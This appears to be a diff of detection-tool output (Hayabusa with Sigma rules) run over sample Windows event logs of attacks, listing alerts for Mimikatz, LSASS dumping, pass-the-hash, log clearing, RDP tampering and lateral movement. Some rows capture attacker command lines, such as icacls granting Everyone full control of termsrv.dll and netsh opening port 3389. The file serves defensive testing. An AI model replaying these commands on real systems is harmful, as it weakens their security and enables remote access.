+2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat""   :  Path: C:\Windows\System32\cmd.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst""  -i -o  :  Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow  :  Path: C:\Windows\System32\netsh.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst""  -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding  :  Path: C:\Windows\System32\rundll32.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe""   :  Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f  C:\Windows\System32\termsrv.dll  :  Path: C:\Windows\System32\takeown.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F  :  Path: C:\Windows\System32\icacls.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F)  :  Path: C:\Windows\System32\icacls.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
+2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
+2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01  :  Workstation:   :  IP Address: ::1  :  Port: 0  :  LogonID: 0x4530f0f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01  :  LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01  :  Target User: administrator  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01  :  Target User: administrator  :  IP Address: -  :  Process: C:\Windows\System32\wbem\WMIC.exe  :  Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01  :  Target User: administrator  :  IP Address: -  :  Process: C:\Windows\System32\wbem\WMIC.exe  :  Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Program Files\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: BGinfo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
